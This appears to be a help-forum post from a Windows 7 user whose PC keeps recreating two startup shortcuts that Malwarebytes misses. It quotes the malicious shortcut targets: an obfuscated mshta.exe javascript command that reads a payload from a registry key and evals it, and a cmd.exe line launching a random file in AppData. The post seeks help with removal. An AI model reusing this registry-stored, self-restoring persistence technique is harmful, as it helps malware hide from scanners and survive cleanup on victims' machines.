I have a windows 7 infection that keeps creating two shortcuts in the windows startup folder, when they are deleted the active programs immediately run them. If they are deleted in safe mode and rebooted into safe mode they don't come back until boo regular into windows. Malwarebytes does not detect these. They seem to using internet explorer even though it is not running. They generate a lot of internet temporary files in this directory:
C:\Users\*****\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\
26c537
C:\Windows\system32\mshta.exe "javascript:R9hCOTH="4fxqNgUm";I9F3=new ActiveXObject("WScript.Shell");xUrsg1S="l";hN7GO=I9F3.RegRead("HKCU\\software\\mcat\\liwsiiful");Gs0BQA="2bWnvIbt";eval(hN7GO);Sk8SYl="mt2oq";"
359008
C:\Windows\System32\cmd.exe /C start "" "C:\Users\*****\AppData\Roaming\a954d0\88b911.725d085"
If they are deleted they replicate, if they are deleted in safe mode and rebooted into safe mode they don't come back until boo regular into windows